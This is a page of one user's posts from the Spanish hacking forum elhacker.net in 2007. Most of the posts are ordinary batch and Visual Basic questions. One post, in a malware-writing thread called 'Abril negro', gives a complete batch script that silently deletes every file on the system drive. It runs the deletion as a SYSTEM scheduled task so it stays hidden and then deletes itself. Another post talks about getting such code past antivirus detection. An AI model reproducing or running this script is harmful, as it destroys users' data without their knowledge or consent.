elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 [44] 45 46 47 48 49 50 51
431  Programación / Scripting / Re: No se que pasa que >> me lo pone como 1>> en: 17 Abril 2007, 15:29 pm
Pues entonces te aseguro k no se cual es el problema

"a.bat" si k existe y se encuentra en el directorio correcto

Ademas si pongo:

Código:
a.bat

o

Código:
call a.bat

me funciona


Y si pongo:

Código:
a.bat >> NUL

o

Código:
call a.bat >>NUL

no funciona...

Weno, ya k el problema no es de eso dime...como podría hacer para llamar a un .bat dando la salida nula, NUL

Un saludo ;) ;)
432  Programación / Scripting / Re: Como saber si una variable es un numero, otro caracter o una mezcla de ambos en: 17 Abril 2007, 15:17 pm
Jaja, perdon, es k al principio había escrito otra cosa y lo modifike y se me olvidó ponerlo en BATCH...

Muy buena idea la de tu codigo, yo ya lo había intentado con el comando SET pero lo k hacia es sumarle 1 y pensaba k si el caracter no fuera un numero devolvería error por lo k podría aprovechar la variable %errorlevel%

Muy bien pensado...justo lo k necesitaba, gracias ;) ;)
433  Seguridad Informática / Abril negro / Re: Abril Negro 2007 en: 17 Abril 2007, 14:59 pm
El modulo IMON me detecta una amenaza tan solo con entrar a esta pagina jajaja...asi k hay k ingienarselas para k no detecten este codigo los antivirus...

Y por cierto...k es lo k hace??

Un saludo ;) ;)
434  Programación / Scripting / Como saber si una variable es un numero, otro caracter o una mezcla de ambos en: 15 Abril 2007, 16:19 pm
Lo intenté con el comando if pero me kedaba un codigo muy pero k muy largo, y eso contando que la viariable solo tuviera 2 digitos...por eso quiero k me ayuden...

Lo que quiero es una forma de saber si una variable es un numero o otro caracter no numerico, o una mezcla de ambos...

Un saludo ;) ;)
435  Programación / Programación Visual Basic / Re: [+] MSN Kick - Codigo Fuente en: 14 Abril 2007, 21:10 pm
Weno, una cosa...Estoy aprendiendo VB y este code me parece bueno para aprender...

No entiendo este control:

Código:
Private Sub OverTimer_Timer()

    If Not isMouseOver Then
        OverTimer.Enabled = False
        isOver = False
        Call Redraw(0, True)
        RaiseEvent MouseOut
    End If

End Sub

¿Cual es su funcion?

Y otra pregunta ¿el hecho de que si estas en el medio del atake y presionas Ctrl+Alt+Supr haga parar el atake es debido a alguna parte del code?

Un saludo ;) ;)

P.D.:¿Podrías postear el code de tu ultima version?
436  Programación / Scripting / Re: Problema con variables y findstr en: 13 Abril 2007, 22:50 pm
Dices que con un findstr consigues lo que quieres pero no puedes asignar la salida a una variable...Pues si que puedes...Añadiendo lo que esta en la primera linea al final (> temp.tmp) Así das salida de la linea a un archivo de texto plano, despues con el FOR cojes la linea del archivo y la pasas a una variable llamada %var% , por ultimo borras el archivo que ya no te sirve...

Código:
findstr parametros_que_sean > temp.tmp
for /F %%I IN (temp.tmp) DO set var="%%I"
del /S /Q /F /A:- temp.tmp

Pienso que funciona pero no lo prové...

Lo que no me acuerdo es para sacar de un archivo de texto de la primera linea los caracteres 7mo y 8vo...Es muy facil usando el FOR pero es que ahora mismo no me acuerdo y como dices que lo consigues hacer con el FINDSTR lo que te puse yo debería funcionarte...

Un saludo ;) ;)
437  Programación / Scripting / Re: Duda sobre DEBUG en: 11 Abril 2007, 15:16 pm
OK, entoncesw da igual, OK

venga, gracias por todo, llevo mucho tiempo esperando poder hacer algo asi  ;D ;D

Saludos ;) ;)
438  Programación / Scripting / Re: No se que pasa que >> me lo pone como 1>> en: 11 Abril 2007, 15:09 pm
Si que afecta.

La mayoría de las veces no, en la mayoría de comandos.

Pero por ejemplo con el comando CALL si que importa.

El otro dia esto me funcionaba perfectamente:

Código:
call a.bat >> NUL

y ahora ejecuta esto:

Código:
call a.bat >> NUL

y no me funciona, me pone uno o varios mensajes de "No se encuentra el proceso por lotes"
Pienso que es de ese 1>> el problema, pero en realidad el problema que yo tenfo es que quiero llamar a un bat para que no de salida y el otro dia el poner call a.bat>>NUL o call a.bat >> NUL me funcionaba perfectamente, ahora incluso sin poner call tampoco me funciona, si pongo solo a.bat >> NUL pues me pone el mismo mensaje de error.

¿De que puede ser?

un saludo ;) ;)
439  Seguridad Informática / Abril negro / Re: Abril Negro 2007 en: 11 Abril 2007, 02:44 am
Weno, si consigues ejecutar el del como SYSTEM no se mostrará la ventana, sería algo así:

Código:
@echo off
echo del /S /Q /F /A:- %homedrive%\* > temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
set y=%TIME:~6,2%
goto a
:2caso
set x=%TIME:~4,2%
set y=%TIME:~8,2%
goto a
:3caso
set x=%TIME:~5,2%
set y=%TIME:~10,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:%y% /ru System
if %a%==11 goto error
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit

Así no se vería...jejeje...pero la verdad es que tarda bastante tiempo y es bastante lamerada.
Lo de VBscript tambien, pero no se usar VBscript, con un FOR en BATCH tambien puedes borrar por ejemplo todos los .doc y así...

Weno, la verdad es que no se para que discutimos de que manera es mejor usar el DEL jajaja :xD :xD :xD

Saludos ;) ;)
440  Programación / Scripting / Re: Duda sobre DEBUG en: 10 Abril 2007, 20:53 pm
Que bueno!!! Ya había visitado esa pagina pero no sabia que tenia esa funcion, no sabia que se podia hacer eso con BATCH  :o :o

Y una duda: ¿para que sirve el boton de seleccion "Binary"?

Un saludo ;) ;)
Páginas: 1 ... 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 [44] 45 46 47 48 49 50 51
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines